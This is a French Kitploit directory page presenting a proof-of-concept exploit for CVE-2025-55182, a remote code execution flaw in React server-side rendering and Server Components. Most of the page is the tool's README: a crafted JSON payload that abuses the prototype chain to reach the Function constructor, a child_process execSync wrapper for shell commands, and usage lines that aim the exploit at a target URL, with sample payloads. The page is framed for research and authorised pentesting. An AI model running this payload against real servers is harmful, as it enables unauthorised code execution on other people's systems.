Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
react-ssr-vulnerability — Ceci est un script POC pour CVE-2025-55182 (React SSR RCE) | Kitploit
Outils/GitHubGitHub/darker-ink/react-ssr-vulnerability
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubdarker-ink/react-ssr-vulnerability

react-ssr-vulnerability

Ceci est un script POC pour CVE-2025-55182 (React SSR RCE)

Voir le dépôt
il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182 - POC RCE pour React Server Components

Ceci est un POC destiné uniquement à des fins éducatives et de recherche en sécurité. Cette vulnérabilité a été corrigée dans les dernières versions des paquets concernés. Utilisez cet outil uniquement sur des systèmes que vous possédez ou pour lesquels vous avez l'autorisation explicite de tester. Je ne suis pas responsable des actions en justice engagées contre vous.

Construction du payload

L'exploit crée un objet JSON spécialement conçu qui abuse de la chaîne de prototypes de JavaScript :

root@kitploit:~
{
  "then": "$1:__proto__:then",           // Pollutes the prototype chain
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": jsCode,                    // Injected malicious code
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

Encapsulation des commandes

Le POC prend en charge deux modes :

Mode standard (par défaut) :

root@kitploit:~
process.mainModule.require("child_process").execSync("YOUR_COMMAND");

Enveloppe les commandes shell pour les exécuter via le module child_process de Node.js.

Mode brut (option --raw) :

root@kitploit:~
// Executes arbitrary JavaScript directly

Permet l'exécution directe de code JavaScript sans encapsulation de commande shell.

Utilisation

Exécution de commande de base

root@kitploit:~
bun run index.ts <command_file> <target_url>

Exemple :

root@kitploit:~
# Create a command file
echo "whoami" > cmd.txt

# Execute against vulnerable endpoint
bun run index.ts cmd.txt http://localhost:3000

Mode JavaScript brut

root@kitploit:~
bun run index.ts --raw <js_file> <target_url>

Exemple :

root@kitploit:~
# Create JavaScript payload
echo "require('fs').writeFileSync('/tmp/pwned.txt', 'RCE Success')" > payload.js

# Execute raw JavaScript
bun run index.ts --raw payload.js http://localhost:3000

Arguments

  • <file_path> : Chemin vers le fichier contenant la commande ou le code JavaScript
  • <target_url> : URL du point de terminaison React Server Function
  • --raw : (Facultatif) Exécute du JavaScript brut au lieu de commandes shell

Attribution

Découvert par : Lachlan Davidson
Divulgué par : The React Team & Meta Security

Références

  • Avis de sécurité officiel de React
  • CVE-2025-55182
Télécharger l’outil